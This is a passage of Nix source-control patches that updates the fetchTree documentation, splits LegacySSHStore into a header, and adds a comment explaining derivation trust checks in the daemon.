set representation or in the URL-like syntax. - The input should be "locked", that is, it should contain a commit hash or content hash unless impure evaluation (`--impure`) is enabled. + Fetch a file system tree or a plain file using one of the supported backends and return an attribute set with: - > **Note** + - the resulting fixed-output [store path](@docroot@/glossary.md#gloss-store-path) + - the corresponding [NAR](@docroot@/glossary.md#gloss-nar) hash + - backend-specific metadata (currently not documented). + + *input* must be an attribute set with the following attributes: + + - `type` (String, required) + + One of the [supported source types](#source-types). + This determines other required and allowed input attributes. + + - `narHash` (String, optional) + + The `narHash` parameter can be used to substitute the source of the tree. + It also allows for verification of tree contents that may not be provided by the underlying transfer mechanism. + If `narHash` is set, the source is first looked up is the Nix store and [substituters](@docroot@/command-ref/conf-file.md#conf-substituters), and only fetched if not available. + + A subset of the output attributes of `fetchTree` can be re-used for subsequent calls to `fetchTree` to produce the same result again. + That is, `fetchTree` is idempotent. + + Downloads are cached in `$XDG_CACHE_HOME/nix`. + The remote source will be fetched from the network if both are true: + - A NAR hash is supplied and the corresponding store path is not [valid](@docroot@/glossary.md#gloss-validity), that is, not available in the store + + > **Note** + > + > [Substituters](@docroot@/command-ref/conf-file.md#conf-substituters) are not used in fetching. + + - There is no cache entry or the cache entry is older than [`tarball-ttl`](@docroot@/command-ref/conf-file.md#conf-tarball-ttl) + + ## Source types + + The following source types and associated input attributes are supported. + + + + - `"file"` + + Place a plain file into the Nix store. + This is similar to [`builtins.fetchurl`](@docroot@/language/builtins.md#builtins-fetchurl) + + - `url` (String, required) + + Supported protocols: + + - `https` + + > **Example** + > + > ```nix + > fetchTree { + > type = "file"; + > url = "https://example.com/index.html"; + > } + > ``` + + - `http` + + Insecure HTTP transfer for legacy sources. + + > **Warning** + > + > HTTP performs no encryption or authentication. + > Use a `narHash` known in advance to ensure the output has expected contents. + + - `file` + + A file on the local file system. + + > **Example** + > + > ```nix + > fetchTree { + > type = "file"; + > url = "file:///home/eelco/nix/README.md"; + > } + > ``` + + - `"tarball"` + + Download a tar archive and extract it into the Nix store. + This has the same underyling implementation as [`builtins.fetchTarball`](@docroot@/language/builtins.md#builtins-fetchTarball) + + - `url` (String, required) + + > **Example** + > + > ```nix + > fetchTree { + > type = "tarball"; + > url = "https://github.com/NixOS/nixpkgs/tarball/nixpkgs-23.11"; + > } + > ``` + + - `"git"` + + Fetch a Git tree and copy it to the Nix store. + This is similar to [`builtins.fetchGit`](@docroot@/language/builtins.md#builtins-fetchGit). + + - `url` (String, required) + + The URL formats supported are the same as for Git itself. + + > **Example** + > + > ```nix + > fetchTree { + > type = "git"; + > url = "git@github.com:NixOS/nixpkgs.git"; + > } + > ``` + + > **Note** + > + > If the URL points to a local directory, and no `ref` or `rev` is given, Nix will only consider files added to the Git index, as listed by `git ls-files` but use the *current file contents* of the Git working directory. + + - `ref` (String, optional) + + A [Git reference](https://git-scm.com/book/en/v2/Git-Internals-Git-References), such as a branch or tag name. + + Default: `"HEAD"` + + - `rev` (String, optional) + + A Git revision; a commit hash. + + Default: the tip of `ref` + + - `shallow` (Bool, optional) + + Make a shallow clone when fetching the Git tree. + + Default: `false` + + - `submodules` (Bool, optional) + + Also fetch submodules if available. + + Default: `false` + + - `allRefs` (Bool, optional) + + If set to `true`, always fetch the entire repository, even if the latest commit is still in the cache. + Otherwise, only the latest commit is fetched if it is not already cached. + + Default: `false` + + - `lastModified` (Integer, optional) + + Unix timestamp of the fetched commit. + + If set, pass through the value to the output attribute set. + Otherwise, generated from the fetched Git tree. + + - `revCount` (Integer, optional) + + Number of revisions in the history of the Git repository before the fetched commit. + + If set, pass through the value to the output attribute set. + Otherwise, generated from the fetched Git tree. + + The following input types are still subject to change: + + - `"path"` + - `"github"` + - `"gitlab"` + - `"sourcehut"` + - `"mercurial"` + + *input* can also be a [URL-like reference](@docroot@/command-ref/new-cli/nix3-flake.md#flake-references). + The additional input types and the URL-like syntax requires the [`flakes` experimental feature](@docroot@/contributing/experimental-features.md#xp-feature-flakes) to be enabled. + + > **Example** > - > The URL-like syntax requires the [`flakes` experimental feature](@docroot@/contributing/experimental-features.md#xp-feature-flakes) to be enabled. + > Fetch a GitHub repository using the attribute set representation: + > + > ```nix + > builtins.fetchTree { + > type = "github"; + > owner = "NixOS"; + > repo = "nixpkgs"; + > rev = "ae2e6b3958682513d28f7d633734571fb18285dd"; + > } + > ``` + > + > This evaluates to the following attribute set: + > + > ```nix + > { + > lastModified = 1686503798; + > lastModifiedDate = "20230611171638"; + > narHash = "sha256-rA9RqKP9OlBrgGCPvfd5HVAXDOy8k2SmPtB/ijShNXc="; + > outPath = "/nix/store/l5m6qlvfs9sdw14ja3qbzpglcjlb6j1x-source"; + > rev = "ae2e6b3958682513d28f7d633734571fb18285dd"; + > shortRev = "ae2e6b3"; + > } + > ``` - Here are some examples of how to use `fetchTree`: - - - Fetch a GitHub repository using the attribute set representation: - - ```nix - builtins.fetchTree { - type = "github"; - owner = "NixOS"; - repo = "nixpkgs"; - rev = "ae2e6b3958682513d28f7d633734571fb18285dd"; - } - ``` - - This evaluates to the following attribute set: - - ``` - { - lastModified = 1686503798; - lastModifiedDate = "20230611171638"; - narHash = "sha256-rA9RqKP9OlBrgGCPvfd5HVAXDOy8k2SmPtB/ijShNXc="; - outPath = "/nix/store/l5m6qlvfs9sdw14ja3qbzpglcjlb6j1x-source"; - rev = "ae2e6b3958682513d28f7d633734571fb18285dd"; - shortRev = "ae2e6b3"; - } - ``` - - - Fetch the same GitHub repository using the URL-like syntax: - - ``` - builtins.fetchTree "github:NixOS/nixpkgs/ae2e6b3958682513d28f7d633734571fb18285dd" - ``` + > **Example** + > + > Fetch the same GitHub repository using the URL-like syntax: + > + > ```nix + > builtins.fetchTree "github:NixOS/nixpkgs/ae2e6b3958682513d28f7d633734571fb18285dd" + > ``` )", .fun = prim_fetchTree, .experimentalFeature = Xp::FetchTree, diff --git a/src/nix/main.cc b/src/nix/main.cc index 109d2cc04..39c04069b 100644 --- a/src/nix/main.cc +++ b/src/nix/main.cc @@ -373,6 +373,7 @@ void mainWrapped(int argc, char * * argv) Xp::Flakes, Xp::FetchClosure, Xp::DynamicDerivations, + Xp::FetchTree, }; evalSettings.pureEval = false; EvalState state({}, openStore("dummy://")); From deadb3bfe9cde3e78e8e89340e4c92499069461a Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 10 Dec 2023 14:28:14 -0500 Subject: [PATCH 085/654] Create header for `LegacySSHStore` In https://github.com/NixOS/nix/pull/6134#issuecomment-1079199888, @thuffschmitt proposed exposing `LegacySSHStore` in Nix for deduplication with Hydra, at least temporarily. I think that is a good idea. Note that the diff will look bad unless one ignores whitespace! Also try this locally: ```shell-session git diff --ignore-all-space HEAD^:src/libstore/legacy-ssh-store.cc HEAD:src/libstore/legacy-ssh-store.cc git diff --ignore-all-space HEAD^:src/libstore/legacy-ssh-store.cc HEAD:src/libstore/legacy-ssh-store.hh ``` --- src/libstore/legacy-ssh-store.cc | 726 ++++++++++++++----------------- src/libstore/legacy-ssh-store.hh | 132 ++++++ 2 files changed, 466 insertions(+), 392 deletions(-) create mode 100644 src/libstore/legacy-ssh-store.hh diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 8ef2daa7b..06bef9d08 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -1,3 +1,4 @@ +#include "legacy-ssh-store.hh" #include "ssh-store-config.hh" #include "archive.hh" #include "pool.hh" @@ -13,414 +14,355 @@ namespace nix { -struct LegacySSHStoreConfig : virtual CommonSSHStoreConfig +std::string LegacySSHStoreConfig::doc() { - using CommonSSHStoreConfig::CommonSSHStoreConfig; + return + #include "legacy-ssh-store.md" + ; +} - const Setting remoteProgram{this, "nix-store", "remote-program", - "Path to the `nix-store` executable on the remote machine."}; - const Setting maxConnections{this, 1, "max-connections", - "Maximum number of concurrent SSH connections."}; - - const std::string name() override { return "SSH Store"; } - - std::string doc() override - { - return - #include "legacy-ssh-store.md" - ; - } -}; - -struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Store +struct LegacySSHStore::Connection { - // Hack for getting remote build log output. - // Intentionally not in `LegacySSHStoreConfig` so that it doesn't appear in - // the documentation - const Setting logFD{this, -1, "log-fd", "file descriptor to which SSH's stderr is connected"}; - - struct Connection - { - std::unique_ptr sshConn; - FdSink to; - FdSource from; - ServeProto::Version remoteVersion; - bool good = true; - - /** - * Coercion to `ServeProto::ReadConn`. This makes it easy to use the - * factored out serve protocol searlizers with a - * `LegacySSHStore::Connection`. - * - * The serve protocol connection types are unidirectional, unlike - * this type. - */ - operator ServeProto::ReadConn () - { - return ServeProto::ReadConn { - .from = from, - .version = remoteVersion, - }; - } - - /* - * Coercion to `ServeProto::WriteConn`. This makes it easy to use the - * factored out serve protocol searlizers with a - * `LegacySSHStore::Connection`. - * - * The serve protocol connection types are unidirectional, unlike - * this type. - */ - operator ServeProto::WriteConn () - { - return ServeProto::WriteConn { - .to = to, - .version = remoteVersion, - }; - } - }; - - std::string host; - - ref> connections; - - SSHMaster master; - - static std::set uriSchemes() { return {"ssh"}; } - - LegacySSHStore(const std::string & scheme, const std::string & host, const Params & params) - : StoreConfig(params) - , CommonSSHStoreConfig(params) - , LegacySSHStoreConfig(params) - , Store(params) - , host(host) - , connections(make_ref>( - std::max(1, (int) maxConnections), - [this]() { return openConnection(); }, - [](const ref & r) { return r->good; } - )) - , master( - host, - sshKey, - sshPublicHostKey, - // Use SSH master only if using more than 1 connection. - connections->capacity() > 1, - compress, - logFD) - { - } - - ref openConnection() - { - auto conn = make_ref(); - conn->sshConn = master.startCommand( - fmt("%s --serve --write", remoteProgram) - + (remoteStore.get() == "" ? "" : " --store " + shellEscape(remoteStore.get()))); - conn->to = FdSink(conn->sshConn->in.get()); - conn->from = FdSource(conn->sshConn->out.get()); - - try { - conn->to << SERVE_MAGIC_1 << SERVE_PROTOCOL_VERSION; - conn->to.flush(); - - StringSink saved; - try { - TeeSource tee(conn->from, saved); - unsigned int magic = readInt(tee); - if (magic != SERVE_MAGIC_2) - throw Error("'nix-store --serve' protocol mismatch from '%s'", host); - } catch (SerialisationError & e) { - /* In case the other side is waiting for our input, - close it. */ - conn->sshConn->in.close(); - auto msg = conn->from.drain(); - throw Error("'nix-store --serve' protocol mismatch from '%s', got '%s'", - host, chomp(saved.s + msg)); - } - conn->remoteVersion = readInt(conn->from); - if (GET_PROTOCOL_MAJOR(conn->remoteVersion) != 0x200) - throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); - - } catch (EndOfFile & e) { - throw Error("cannot connect to '%1%'", host); - } - - return conn; - }; - - std::string getUri() override - { - return *uriSchemes().begin() + "://" + host; - } - - void queryPathInfoUncached(const StorePath & path, - Callback> callback) noexcept override - { - try { - auto conn(connections->get()); - - /* No longer support missing NAR hash */ - assert(GET_PROTOCOL_MINOR(conn->remoteVersion) >= 4); - - debug("querying remote host '%s' for info on '%s'", host, printStorePath(path)); - - conn->to << ServeProto::Command::QueryPathInfos << PathSet{printStorePath(path)}; - conn->to.flush(); - - auto p = readString(conn->from); - if (p.empty()) return callback(nullptr); - auto path2 = parseStorePath(p); - assert(path == path2); - auto info = std::make_shared( - path, - ServeProto::Serialise::read(*this, *conn)); - - if (info->narHash == Hash::dummy) - throw Error("NAR hash is now mandatory"); - - auto s = readString(conn->from); - assert(s == ""); - - callback(std::move(info)); - } catch (...) { callback.rethrow(); } - } - - void addToStore(const ValidPathInfo & info, Source & source, - RepairFlag repair, CheckSigsFlag checkSigs) override - { - debug("adding path '%s' to remote host '%s'", printStorePath(info.path), host); - - auto conn(connections->get()); - - if (GET_PROTOCOL_MINOR(conn->remoteVersion) >= 5) { - - conn->to - << ServeProto::Command::AddToStoreNar - << printStorePath(info.path) - << (info.deriver ? printStorePath(*info.deriver) : "") - << info.narHash.to_string(HashFormat::Base16, false); - ServeProto::write(*this, *conn, info.references); - conn->to - << info.registrationTime - << info.narSize - << info.ultimate - << info.sigs - << renderContentAddress(info.ca); - try { - copyNAR(source, conn->to); - } catch (...) { - conn->good = false; - throw; - } - conn->to.flush(); - - } else { - - conn->to - << ServeProto::Command::ImportPaths - << 1; - try { - copyNAR(source, conn->to); - } catch (...) { - conn->good = false; - throw; - } - conn->to - << exportMagic - << printStorePath(info.path); - ServeProto::write(*this, *conn, info.references); - conn->to - << (info.deriver ? printStorePath(*info.deriver) : "") - << 0 - << 0; - conn->to.flush(); - - } - - if (readInt(conn->from) != 1) - throw Error("failed to add path '%s' to remote host '%s'", printStorePath(info.path), host); - } - - void narFromPath(const StorePath & path, Sink & sink) override - { - auto conn(connections->get()); - - conn->to << ServeProto::Command::DumpStorePath << printStorePath(path); - conn->to.flush(); - copyNAR(conn->from, sink); - } - - std::optional queryPathFromHashPart(const std::string & hashPart) override - { unsupported("queryPathFromHashPart"); } - - StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override - { unsupported("addToStore"); } - - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override - { unsupported("addTextToStore"); } - -private: - - void putBuildSettings(Connection & conn) - { - ServeProto::write(*this, conn, ServeProto::BuildOptions { - .maxSilentTime = settings.maxSilentTime, - .buildTimeout = settings.buildTimeout, - .maxLogSize = settings.maxLogSize, - .nrRepeats = 0, // buildRepeat hasn't worked for ages anyway - .enforceDeterminism = 0, - .keepFailed = settings.keepFailed, - }); - } - -public: - - BuildResult buildDerivation(const StorePath & drvPath, const BasicDerivation & drv, - BuildMode buildMode) override - { - auto conn(connections->get()); - - conn->to - << ServeProto::Command::BuildDerivation - << printStorePath(drvPath); - writeDerivation(conn->to, *this, drv); - - putBuildSettings(*conn); - - conn->to.flush(); - - return ServeProto::Serialise::read(*this, *conn); - } - - void buildPaths(const std::vector & drvPaths, BuildMode buildMode, std::shared_ptr evalStore) override - { - if (evalStore && evalStore.get() != this) - throw Error("building on an SSH store is incompatible with '--eval-store'"); - - auto conn(connections->get()); - - conn->to << ServeProto::Command::BuildPaths; - Strings ss; - for (auto & p : drvPaths) { - auto sOrDrvPath = StorePathWithOutputs::tryFromDerivedPath(p); - std::visit(overloaded { - [&](const StorePathWithOutputs & s) { - ss.push_back(s.to_string(*this)); - }, - [&](const StorePath & drvPath) { - throw Error("wanted to fetch '%s' but the legacy ssh protocol doesn't support merely substituting drv files via the build paths command. It would build them instead. Try using ssh-ng://", printStorePath(drvPath)); - }, - [&](std::monostate) { - throw Error("wanted build derivation that is itself a build product, but the legacy ssh protocol doesn't support that. Try using ssh-ng://"); - }, - }, sOrDrvPath); - } - conn->to << ss; - - putBuildSettings(*conn); - - conn->to.flush(); - - BuildResult result; - result.status = (BuildResult::Status) readInt(conn->from); - - if (!result.success()) { - conn->from >> result.errorMsg; - throw Error(result.status, result.errorMsg); - } - } - - void ensurePath(const StorePath & path) override - { unsupported("ensurePath"); } - - virtual ref getFSAccessor(bool requireValidPath) override - { unsupported("getFSAccessor"); } + std::unique_ptr sshConn; + FdSink to; + FdSource from; + ServeProto::Version remoteVersion; + bool good = true; /** - * The default instance would schedule the work on the client side, but - * for consistency with `buildPaths` and `buildDerivation` it should happen - * on the remote side. + * Coercion to `ServeProto::ReadConn`. This makes it easy to use the + * factored out serve protocol searlizers with a + * `LegacySSHStore::Connection`. * - * We make this fail for now so we can add implement this properly later - * without it being a breaking change. + * The serve protocol connection types are unidirectional, unlike + * this type. */ - void repairPath(const StorePath & path) override - { unsupported("repairPath"); } - - void computeFSClosure(const StorePathSet & paths, - StorePathSet & out, bool flipDirection = false, - bool includeOutputs = false, bool includeDerivers = false) override + operator ServeProto::ReadConn () { - if (flipDirection || includeDerivers) { - Store::computeFSClosure(paths, out, flipDirection, includeOutputs, includeDerivers); - return; - } - - auto conn(connections->get()); - - conn->to - << ServeProto::Command::QueryClosure - << includeOutputs; - ServeProto::write(*this, *conn, paths); - conn->to.flush(); - - for (auto & i : ServeProto::Serialise::read(*this, *conn)) - out.insert(i); + return ServeProto::ReadConn { + .from = from, + .version = remoteVersion, + }; } - StorePathSet queryValidPaths(const StorePathSet & paths, - SubstituteFlag maybeSubstitute = NoSubstitute) override - { - auto conn(connections->get()); - - conn->to - << ServeProto::Command::QueryValidPaths - << false // lock - << maybeSubstitute; - ServeProto::write(*this, *conn, paths); - conn->to.flush(); - - return ServeProto::Serialise::read(*this, *conn); - } - - void connect() override - { - auto conn(connections->get()); - } - - unsigned int getProtocol() override - { - auto conn(connections->get()); - return conn->remoteVersion; - } - - /** - * The legacy ssh protocol doesn't support checking for trusted-user. - * Try using ssh-ng:// instead if you want to know. + /* + * Coercion to `ServeProto::WriteConn`. This makes it easy to use the + * factored out serve protocol searlizers with a + * `LegacySSHStore::Connection`. + * + * The serve protocol connection types are unidirectional, unlike + * this type. */ - std::optional isTrustedClient() override + operator ServeProto::WriteConn () { - return std::nullopt; + return ServeProto::WriteConn { + .to = to, + .version = remoteVersion, + }; } - - void queryRealisationUncached(const DrvOutput &, - Callback> callback) noexcept override - // TODO: Implement - { unsupported("queryRealisation"); } }; + +LegacySSHStore::LegacySSHStore(const std::string & scheme, const std::string & host, const Params & params) + : StoreConfig(params) + , CommonSSHStoreConfig(params) + , LegacySSHStoreConfig(params) + , Store(params) + , host(host) + , connections(make_ref>( + std::max(1, (int) maxConnections), + [this]() { return openConnection(); }, + [](const ref & r) { return r->good; } + )) + , master( + host, + sshKey, + sshPublicHostKey, + // Use SSH master only if using more than 1 connection. + connections->capacity() > 1, + compress, + logFD) +{ +} + + +ref LegacySSHStore::openConnection() +{ + auto conn = make_ref(); + conn->sshConn = master.startCommand( + fmt("%s --serve --write", remoteProgram) + + (remoteStore.get() == "" ? "" : " --store " + shellEscape(remoteStore.get()))); + conn->to = FdSink(conn->sshConn->in.get()); + conn->from = FdSource(conn->sshConn->out.get()); + + try { + conn->to << SERVE_MAGIC_1 << SERVE_PROTOCOL_VERSION; + conn->to.flush(); + + StringSink saved; + try { + TeeSource tee(conn->from, saved); + unsigned int magic = readInt(tee); + if (magic != SERVE_MAGIC_2) + throw Error("'nix-store --serve' protocol mismatch from '%s'", host); + } catch (SerialisationError & e) { + /* In case the other side is waiting for our input, + close it. */ + conn->sshConn->in.close(); + auto msg = conn->from.drain(); + throw Error("'nix-store --serve' protocol mismatch from '%s', got '%s'", + host, chomp(saved.s + msg)); + } + conn->remoteVersion = readInt(conn->from); + if (GET_PROTOCOL_MAJOR(conn->remoteVersion) != 0x200) + throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); + + } catch (EndOfFile & e) { + throw Error("cannot connect to '%1%'", host); + } + + return conn; +}; + + +std::string LegacySSHStore::getUri() +{ + return *uriSchemes().begin() + "://" + host; +} + + +void LegacySSHStore::queryPathInfoUncached(const StorePath & path, + Callback> callback) noexcept +{ + try { + auto conn(connections->get()); + + /* No longer support missing NAR hash */ + assert(GET_PROTOCOL_MINOR(conn->remoteVersion) >= 4); + + debug("querying remote host '%s' for info on '%s'", host, printStorePath(path)); + + conn->to << ServeProto::Command::QueryPathInfos << PathSet{printStorePath(path)}; + conn->to.flush(); + + auto p = readString(conn->from); + if (p.empty()) return callback(nullptr); + auto path2 = parseStorePath(p); + assert(path == path2); + auto info = std::make_shared( + path, + ServeProto::Serialise::read(*this, *conn)); + + if (info->narHash == Hash::dummy) + throw Error("NAR hash is now mandatory"); + + auto s = readString(conn->from); + assert(s == ""); + + callback(std::move(info)); + } catch (...) { callback.rethrow(); } +} + + +void LegacySSHStore::addToStore(const ValidPathInfo & info, Source & source, + RepairFlag repair, CheckSigsFlag checkSigs) +{ + debug("adding path '%s' to remote host '%s'", printStorePath(info.path), host); + + auto conn(connections->get()); + + if (GET_PROTOCOL_MINOR(conn->remoteVersion) >= 5) { + + conn->to + << ServeProto::Command::AddToStoreNar + << printStorePath(info.path) + << (info.deriver ? printStorePath(*info.deriver) : "") + << info.narHash.to_string(HashFormat::Base16, false); + ServeProto::write(*this, *conn, info.references); + conn->to + << info.registrationTime + << info.narSize + << info.ultimate + << info.sigs + << renderContentAddress(info.ca); + try { + copyNAR(source, conn->to); + } catch (...) { + conn->good = false; + throw; + } + conn->to.flush(); + + } else { + + conn->to + << ServeProto::Command::ImportPaths + << 1; + try { + copyNAR(source, conn->to); + } catch (...) { + conn->good = false; + throw; + } + conn->to + << exportMagic + << printStorePath(info.path); + ServeProto::write(*this, *conn, info.references); + conn->to + << (info.deriver ? printStorePath(*info.deriver) : "") + << 0 + << 0; + conn->to.flush(); + + } + + if (readInt(conn->from) != 1) + throw Error("failed to add path '%s' to remote host '%s'", printStorePath(info.path), host); +} + + +void LegacySSHStore::narFromPath(const StorePath & path, Sink & sink) +{ + auto conn(connections->get()); + + conn->to << ServeProto::Command::DumpStorePath << printStorePath(path); + conn->to.flush(); + copyNAR(conn->from, sink); +} + + +void LegacySSHStore::putBuildSettings(Connection & conn) +{ + ServeProto::write(*this, conn, ServeProto::BuildOptions { + .maxSilentTime = settings.maxSilentTime, + .buildTimeout = settings.buildTimeout, + .maxLogSize = settings.maxLogSize, + .nrRepeats = 0, // buildRepeat hasn't worked for ages anyway + .enforceDeterminism = 0, + .keepFailed = settings.keepFailed, + }); +} + + +BuildResult LegacySSHStore::buildDerivation(const StorePath & drvPath, const BasicDerivation & drv, + BuildMode buildMode) +{ + auto conn(connections->get()); + + conn->to + << ServeProto::Command::BuildDerivation + << printStorePath(drvPath); + writeDerivation(conn->to, *this, drv); + + putBuildSettings(*conn); + + conn->to.flush(); + + return ServeProto::Serialise::read(*this, *conn); +} + + +void LegacySSHStore::buildPaths(const std::vector & drvPaths, BuildMode buildMode, std::shared_ptr evalStore) +{ + if (evalStore && evalStore.get() != this) + throw Error("building on an SSH store is incompatible with '--eval-store'"); + + auto conn(connections->get()); + + conn->to << ServeProto::Command::BuildPaths; + Strings ss; + for (auto & p : drvPaths) { + auto sOrDrvPath = StorePathWithOutputs::tryFromDerivedPath(p); + std::visit(overloaded { + [&](const StorePathWithOutputs & s) { + ss.push_back(s.to_string(*this)); + }, + [&](const StorePath & drvPath) { + throw Error("wanted to fetch '%s' but the legacy ssh protocol doesn't support merely substituting drv files via the build paths command. It would build them instead. Try using ssh-ng://", printStorePath(drvPath)); + }, + [&](std::monostate) { + throw Error("wanted build derivation that is itself a build product, but the legacy ssh protocol doesn't support that. Try using ssh-ng://"); + }, + }, sOrDrvPath); + } + conn->to << ss; + + putBuildSettings(*conn); + + conn->to.flush(); + + BuildResult result; + result.status = (BuildResult::Status) readInt(conn->from); + + if (!result.success()) { + conn->from >> result.errorMsg; + throw Error(result.status, result.errorMsg); + } +} + + +void LegacySSHStore::computeFSClosure(const StorePathSet & paths, + StorePathSet & out, bool flipDirection, + bool includeOutputs, bool includeDerivers) +{ + if (flipDirection || includeDerivers) { + Store::computeFSClosure(paths, out, flipDirection, includeOutputs, includeDerivers); + return; + } + + auto conn(connections->get()); + + conn->to + << ServeProto::Command::QueryClosure + << includeOutputs; + ServeProto::write(*this, *conn, paths); + conn->to.flush(); + + for (auto & i : ServeProto::Serialise::read(*this, *conn)) + out.insert(i); +} + + +StorePathSet LegacySSHStore::queryValidPaths(const StorePathSet & paths, + SubstituteFlag maybeSubstitute) +{ + auto conn(connections->get()); + + conn->to + << ServeProto::Command::QueryValidPaths + << false // lock + << maybeSubstitute; + ServeProto::write(*this, *conn, paths); + conn->to.flush(); + + return ServeProto::Serialise::read(*this, *conn); +} + + +void LegacySSHStore::connect() +{ + auto conn(connections->get()); +} + + +unsigned int LegacySSHStore::getProtocol() +{ + auto conn(connections->get()); + return conn->remoteVersion; +} + + +/** + * The legacy ssh protocol doesn't support checking for trusted-user. + * Try using ssh-ng:// instead if you want to know. + */ +std::optional isTrustedClient() +{ + return std::nullopt; +} + + static RegisterStoreImplementation regLegacySSHStore; } diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh new file mode 100644 index 000000000..c40c256bb --- /dev/null +++ b/src/libstore/legacy-ssh-store.hh @@ -0,0 +1,132 @@ +#pragma once +///@file + +#include "ssh-store-config.hh" +#include "store-api.hh" +#include "ssh.hh" +#include "callback.hh" +#include "pool.hh" + +namespace nix { + +struct LegacySSHStoreConfig : virtual CommonSSHStoreConfig +{ + using CommonSSHStoreConfig::CommonSSHStoreConfig; + + const Setting remoteProgram{this, "nix-store", "remote-program", + "Path to the `nix-store` executable on the remote machine."}; + + const Setting maxConnections{this, 1, "max-connections", + "Maximum number of concurrent SSH connections."}; + + const std::string name() override { return "SSH Store"; } + + std::string doc() override; +}; + +struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Store +{ + // Hack for getting remote build log output. + // Intentionally not in `LegacySSHStoreConfig` so that it doesn't appear in + // the documentation + const Setting logFD{this, -1, "log-fd", "file descriptor to which SSH's stderr is connected"}; + + struct Connection; + + std::string host; + + ref> connections; + + SSHMaster master; + + static std::set uriSchemes() { return {"ssh"}; } + + LegacySSHStore(const std::string & scheme, const std::string & host, const Params & params); + + ref openConnection(); + + std::string getUri() override; + + void queryPathInfoUncached(const StorePath & path, + Callback> callback) noexcept override; + + void addToStore(const ValidPathInfo & info, Source & source, + RepairFlag repair, CheckSigsFlag checkSigs) override; + + void narFromPath(const StorePath & path, Sink & sink) override; + + std::optional queryPathFromHashPart(const std::string & hashPart) override + { unsupported("queryPathFromHashPart"); } + + StorePath addToStore( + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) override + { unsupported("addToStore"); } + + StorePath addTextToStore( + std::string_view name, + std::string_view s, + const StorePathSet & references, + RepairFlag repair) override + { unsupported("addTextToStore"); } + +private: + + void putBuildSettings(Connection & conn); + +public: + + BuildResult buildDerivation(const StorePath & drvPath, const BasicDerivation & drv, + BuildMode buildMode) override; + + void buildPaths(const std::vector & drvPaths, BuildMode buildMode, std::shared_ptr evalStore) override; + + void ensurePath(const StorePath & path) override + { unsupported("ensurePath"); } + + virtual ref getFSAccessor(bool requireValidPath) override + { unsupported("getFSAccessor"); } + + /** + * The default instance would schedule the work on the client side, but + * for consistency with `buildPaths` and `buildDerivation` it should happen + * on the remote side. + * + * We make this fail for now so we can add implement this properly later + * without it being a breaking change. + */ + void repairPath(const StorePath & path) override + { unsupported("repairPath"); } + + void computeFSClosure(const StorePathSet & paths, + StorePathSet & out, bool flipDirection = false, + bool includeOutputs = false, bool includeDerivers = false) override; + + StorePathSet queryValidPaths(const StorePathSet & paths, + SubstituteFlag maybeSubstitute = NoSubstitute) override; + + void connect() override; + + unsigned int getProtocol() override; + + /** + * The legacy ssh protocol doesn't support checking for trusted-user. + * Try using ssh-ng:// instead if you want to know. + */ + std::optional isTrustedClient() override + { + return std::nullopt; + } + + void queryRealisationUncached(const DrvOutput &, + Callback> callback) noexcept override + // TODO: Implement + { unsupported("queryRealisation"); } +}; + +} From e43bb655feaa23977322d68278c88ac075eb2c41 Mon Sep 17 00:00:00 2001 From: Adam Joseph Date: Sun, 10 Dec 2023 13:58:35 -0800 Subject: [PATCH 086/654] libstore/daemon.cc: note trust model difference in readDerivation()s Below the comment added by this commit is a much longer comment followed by a trust check, both of which have confused me on at least two occasions. I figured it out once, forgot it, then had to ask @Ericson2314 to explain it, at which point I understood it again. I think this might confuse other people too, or maybe I will just forget it a third time. So let's add a comment. Farther down in the function is the following check: ``` if (!(drvType.isCA() || trusted)) throw Error("you are not privileged to build input-addressed derivations"); ``` This seems really strange at first. A key property of Nix is that you can compute the outpath of a derivation using the derivation (and its references-closure) without trusting anybody! The missing insight is that at this point in the code the builder doesn't necessarily have the references-closure of the derivation being built, and therefore needs to trust that the derivation's outPath is honest. It's incredibly easy to overlook this, because the only difference between these two cases is which of these identically-named functions we used: - `readDerivation(Source,Store)` - `Store::readDerivation()` These functions have different trust models (except in the special case where the first function is used on the local store). We should call the reader's attention to this fact. Co-authored-by: Cole Helbling --- src/libstore/daemon.cc | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index 530b1a178..a112d6d31 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -574,6 +574,15 @@ static void performOp(TunnelLogger * logger, ref store, case WorkerProto::Op::BuildDerivation: { auto drvPath = store->parseStorePath(readString(from)); BasicDerivation drv; + /* + * Note: unlike wopEnsurePath, this operation reads a + * derivation-to-be-realized from the client with + * readDerivation(Source,Store) rather than reading it from + * the local store with Store::readDerivation(). Since the + * derivation-to-be-realized is not registered in the store + * it cannot be trusted that its outPath was calculated + * correctly. + */ readDerivation(from, *store, drv, Derivation::nameFromPath(drvPath)); BuildMode buildMode = (BuildMode) readInt(from); logger->startWork(); From 91ba7b230777e3fb023bda48c269d533702e50e8 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 6 Dec 2023 12:41:47 +0100 Subject: [PATCH 087/654] isAllowedURI: Extract function and test --- src/libexpr/eval.cc | 18 +++++-- src/libexpr/eval.hh | 5 ++ tests/unit/libexpr/eval.cc | 106 +++++++++++++++++++++++++++++++++++++ 3 files changed, 124 insertions(+), 5 deletions(-) create mode 100644 tests/unit/libexpr/eval.cc diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 9e494148e..0eb6f406e 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -599,21 +599,29 @@ void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & mkStorePathString(storePath, v); } -void EvalState::checkURI(const std::string & uri) +bool isAllowedURI(std::string_view uri, const Strings & allowedUris) { - if (!evalSettings.restrictEval) 